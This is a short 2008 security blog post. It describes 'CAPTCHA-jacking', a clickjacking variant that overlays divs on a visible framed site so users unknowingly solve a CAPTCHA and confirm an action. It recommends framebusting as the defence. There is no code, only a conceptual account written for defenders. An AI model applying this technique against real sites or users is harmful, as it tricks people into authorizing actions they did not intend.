20081121

CAPTCHA-Jacking

RSnake and Jeremiah Grossman did a really good and thorough job of going over clickjacking and many different ways that it can take place. And until I sat up one night and made my own example, I didn't consider how easy and how serious it was.

Before reading on, please note two things: 1) I'm not claiming to have discovered something new, and 2) I'm not recommending a new name or anything. Rsnake and Jeremiah did all the work and listed a whole series of things that could happen that they admitted were not exhaustive.

However, the most common way to work clickjacking is by completely hiding the target site in a transparent (0.0 opacity) iframe over "the red candy-like button". A teammate and I worked through a proof of concept, though where the idea was to make the target site visible and then use div's above the iframe to hide all the parts you don't want. The most common example would be to have the user solve a CAPTCHA. There are plenty of sites that explain that using a CAPTCHA is a great way to eliminate XSRF and clickjacking all at once.

RSnake and Jeremiah were right - the best way to avoid clickjacking is by using framebusting code. That solves a couple of other problems (although because with IE you can specify a security zone for an iframe it's not bulleproof, but at least you could have noscript that warns the user they might be getting clickjacked) such as dealing with DNS binding attacks. And if users were better about using different passwords for different sites, you can always ask for their password for sensitive actions.

0 comments: